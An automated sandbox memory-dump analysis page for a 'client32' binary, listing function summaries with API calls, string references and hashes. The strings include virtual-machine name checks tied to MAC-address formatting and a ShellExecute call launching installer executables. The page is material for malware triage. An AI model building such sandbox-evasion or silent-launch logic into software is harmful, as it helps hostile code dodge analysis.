Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: IsA()$NSMString.cpp$iAt<=m_nLength$iAt>=0$pszStr!=NULL
API String ID: 4104443479-3876480746
Opcode ID: 36ec98648d29fe0afcc35754f030bdfbbb521fc9e4305061c17343d3ad7bb629
Instruction ID: 79358fa8bd984897630ceb1b94794f39bd20fa9264bb2a6753bf8f4677ca8712
Opcode Fuzzy Hash: 36ec98648d29fe0afcc35754f030bdfbbb521fc9e4305061c17343d3ad7bb629
Instruction Fuzzy Hash: 7B21297A64020ABFDB04AA58DCD4DBF7394EF95358BC44125FE5C6B205EB20BD0441E6

Function 685A7D50 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 685A7E1B

Strings

02004C4F4F50, xrefs: 685A7E23
0000000000, xrefs: 685A7E3C
VMware, xrefs: 685A7DB8
Virtual, xrefs: 685A7DD0
VIRTNET, xrefs: 685A7D8D
%02X%02X%02X%02X%02X%02X, xrefs: 685A7E15

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _sprintf
String ID: %02X%02X%02X%02X%02X%02X$0000000000$02004C4F4F50$VIRTNET$VMware$Virtual
API String ID: 1467051239-555777999
Opcode ID: 6967027be84f99fbf530c3433a8cff4120bab63a82826d81e5c3605691ecba34
Instruction ID: 7989ec8a52d39897fd5c61db717de59bcf340a2263e4f7650474c271b9e20abd
Opcode Fuzzy Hash: 6967027be84f99fbf530c3433a8cff4120bab63a82826d81e5c3605691ecba34
Instruction Fuzzy Hash: 0321E5759003486EDB10DA748C60EFEB7F88F99205F8045D9ED9E92140EA35FA488BA0

Function 110310B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Kernel32.dll,7E4636A2,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031146
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154

Strings

ProcessIdToSessionId, xrefs: 11031126
Kernel32.dll, xrefs: 110310DA

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCurrentErrorFreeLastLoadProcProcess
String ID: Kernel32.dll$ProcessIdToSessionId
API String ID: 1613046405-2825297712
Opcode ID: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
Instruction ID: dbcb6794e105daa586ddc3bbf804ff67aea9c2c21b85bbe8f4e4c15c2f8116d0
Opcode Fuzzy Hash: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
Instruction Fuzzy Hash: 9621A2B1D21269AFCB01DF99D884A9EFFB8FB49B15F10852BF521E3244D7B419018FA1

Function 110273F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B

wsprintfA.USER32 ref: 1102741E

Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F

wsprintfA.USER32 ref: 11027448
ShellExecuteA.SHELL32(00000000,open,?,/EM,00000000,00000001), ref: 1102749B

Strings

"%sWINSTALL.EXE", xrefs: 11027418
open, xrefs: 11027494
/EM, xrefs: 11027488
"%sWINST32.EXE", xrefs: 11027442

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPathwsprintf$CloseExecuteHandleModuleNameShell
String ID: "%sWINST32.EXE"$"%sWINSTALL.EXE"$/EM$open
API String ID: 816263943-3387570681
Opcode ID: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
Instruction ID: 425802901d1907c5be7fd2b9c3bfd6c49e25210cb6f83e26e9bc69af70aaa39f
Opcode Fuzzy Hash: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
Instruction Fuzzy Hash: B411C875E0131EABDB11EBB5CC45FAAF7A89B04708F5041F5E91597181EB31B9048B91

Function 1108B240 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64threadCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(?,00000000), ref: 1108B274
GetWindowThreadProcessId.USER32(00000000,04000000), ref: 1108B293
OpenProcess.KERNEL32(00000440,00000000,04000000,110EAA59,?,04000000,00000000,?,00000000,00000000,?,00000000,110EA93D,?,110EAA59,0000070B), ref: 1108B2A9

Strings

Error. NULL hToken, xrefs: 1108B25B
Progman, xrefs: 1108B250

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProcessWindow$FindOpenThread
String ID: Error. NULL hToken$Progman
API String ID: 3432422346-976623215
Opcode ID: 059be4ecc652e061e66f05b14170a3aabe5fe35332d29859c985ce1771b9b1d6
Instruction ID: 4ee04209679d4ac62f627f7e7d6e091cb71ded9887b28b928329626620bf84cb
Opcode Fuzzy Hash: 059be4ecc652e061e66f05b14170a3aabe5fe35332d29859c985ce1771b9b1d6
Instruction Fuzzy Hash: 25119675E0122D9BD751DFA4D885BEEF7B8EF4C218F1081A9EE16E7240DB31A900C7A5

Function 685B0BB0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 685B0BB8
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 685B0BCB
_malloc.LIBCMT ref: 685B0BF3

Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE

_free.LIBCMT ref: 685B0BEB

Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25

_free.LIBCMT ref: 685B0C10

Strings

IPHLPAPI.DLL, xrefs: 685B0BB1
GetAdaptersInfo, xrefs: 685B0BC5

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Heap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
String ID: GetAdaptersInfo$IPHLPAPI.DLL
API String ID: 1157017740-2359281783
Opcode ID: 48d76f62855ec62bb0d9381c7b5b35f1ce5325d13110ff4c0c651642cc7edece
Instruction ID: 25c412f5d11d50333bc8d02ec31f9a5d9c67d0bd2d4d25448c060648db914400
Opcode Fuzzy Hash: 48d76f62855ec62bb0d9381c7b5b35f1ce5325d13110ff4c0c651642cc7edece
Instruction Fuzzy Hash: 76F0C8B6500741ABD6609B74DDA4D5BB7ECAFA56047508C2EE96AC7500EB35FC40C724

Function 110033B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFF), ref: 110033BE
GetSubMenu.USER32(00000000,00000000), ref: 110033EA
GetSubMenu.USER32(00000000,00000000), ref: 1100340C
DestroyMenu.USER32(00000000), ref: 1100341A

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

hSub, xrefs: 110033FC
hMenu, xrefs: 110033D4
..\CTL32\annotate.cpp, xrefs: 110033CF, 110033F7

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
Instruction ID: 24594387450efb2066981165f5525a36b814e5bc10ecad7e7e85ab1dcfd37f25
Opcode Fuzzy Hash: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
Instruction Fuzzy Hash: 71F0E93AF4066677D61352666CC5F4FE66C8B91AA8F110071F614BA684EE11A80051EA

Function 685B6E37 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,685D72D8,00000008,685B6F3F,00000000,00000000), ref: 685B6E48
__lock.LIBCMT ref: 685B6E7C

Part of subcall function 685BF4BC: __mtinitlocknum.LIBCMT ref: 685BF4D2
Part of subcall function 685BF4BC: __amsg_exit.LIBCMT ref: 685BF4DE
Part of subcall function 685BF4BC: EnterCriticalSection.KERNEL32(00000000,00000000,?,685B6E81,0000000D), ref: 685BF4E6

InterlockedIncrement.KERNEL32(?), ref: 685B6E89
__lock.LIBCMT ref: 685B6E9D
___addlocaleref.LIBCMT ref: 685B6EBB

Strings

@C]h, xrefs: 685B6E51
KERNEL32.DLL, xrefs: 685B6E43

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: @C]h$KERNEL32.DLL
API String ID: 637971194-3482674546
Opcode ID: 7fc64abea5d065c58e64946b5d256ec5bf0912e5ab4918f8221096cc1eae2d08
Instruction ID: 94732c05d8383e3519f0fe6e567bf10f0ad84ecaf2e01f0155b324d556af2794
Opcode Fuzzy Hash: 7fc64abea5d065c58e64946b5d256ec5bf0912e5ab4918f8221096cc1eae2d08
Instruction Fuzzy Hash: 6D016179400B00DEDB209F69C85575FFBF0BFA1324F50890ED996977A0CB74A940CB59

Function 110032C0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EF9), ref: 110032CD
GetSubMenu.USER32(00000000,00000000), ref: 110032F3
GetMenuItemCount.USER32(00000000), ref: 11003317
DestroyMenu.USER32(00000000), ref: 11003329

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

hSub, xrefs: 11003309
hMenu, xrefs: 110032E3
..\CTL32\annotate.cpp, xrefs: 110032DE, 11003304

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 4241058051-934300333
Opcode ID: 8e539d231b0ab8dca2ce90518cca292f254de65541413167144fb169119e5813
Instruction ID: d79372c4e35f96c7b6d882990e3a1748ca0edf213b09d886e21f34e7a2ab119d
Opcode Fuzzy Hash: 8e539d231b0ab8dca2ce90518cca292f254de65541413167144fb169119e5813
Instruction Fuzzy Hash: 56F0E93AF4052777C21352663C49F8FF6684B81BA8F154071F911B5645EE14640051E6

Function 110ED140 Relevance: 12.1, APIs: 8, Instructions: 84filememoryCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,1112E5E6,00000000,?), ref: 110ED158
ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,1112E5E6,00000000,?), ref: 110ED16D
GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110ED18F
GlobalLock.KERNEL32(00000000), ref: 110ED19C
ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110ED1AB
GlobalUnlock.KERNEL32(00000000), ref: 110ED1BB
GlobalUnlock.KERNEL32(00000000), ref: 110ED1D5
GlobalFree.KERNEL32(00000000), ref: 110ED1DC

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Global$File$ReadUnlock$AllocFreeLockSize
String ID:
API String ID: 3489003387-0
Opcode ID: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
Instruction ID: db3aae85cbeca24dbd9e457748b34ba45ed53121808abb5c6b0ad0e7882c1e57
Opcode Fuzzy Hash: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
Instruction Fuzzy Hash: C9218332A0111AAFD701DFA9C889BFEF7BCEB45219F1040ABFB05D6140DB34990187A2

Function 1113F2C0 Relevance: 12.1, APIs: 8, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1113F2CB
GetSubMenu.USER32(?,00000000), ref: 1113F2E8
GetMenuItemID.USER32(?,00000000), ref: 1113F309
GetMenuItemID.USER32(?,00000001), ref: 1113F312
GetMenuItemID.USER32(?,-00000001), ref: 1113F31C
DeleteMenu.USER32(?,00000001,00000400), ref: 1113F332
GetMenuItemID.USER32(?,00000001), ref: 1113F33A
DeleteMenu.USER32(?,-00000001,00000400), ref: 1113F351

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$Item$Delete$Count
String ID:
API String ID: 1985338998-0
Opcode ID: db8ccf8eb5a065f9716819879bea2f70c374054ad31006cd5f0d5a6c3e74d67c
Instruction ID: 90b1ebb2a37eac89ef99d909188e48f60dab5b42f4deb930a222ec681177ebb5
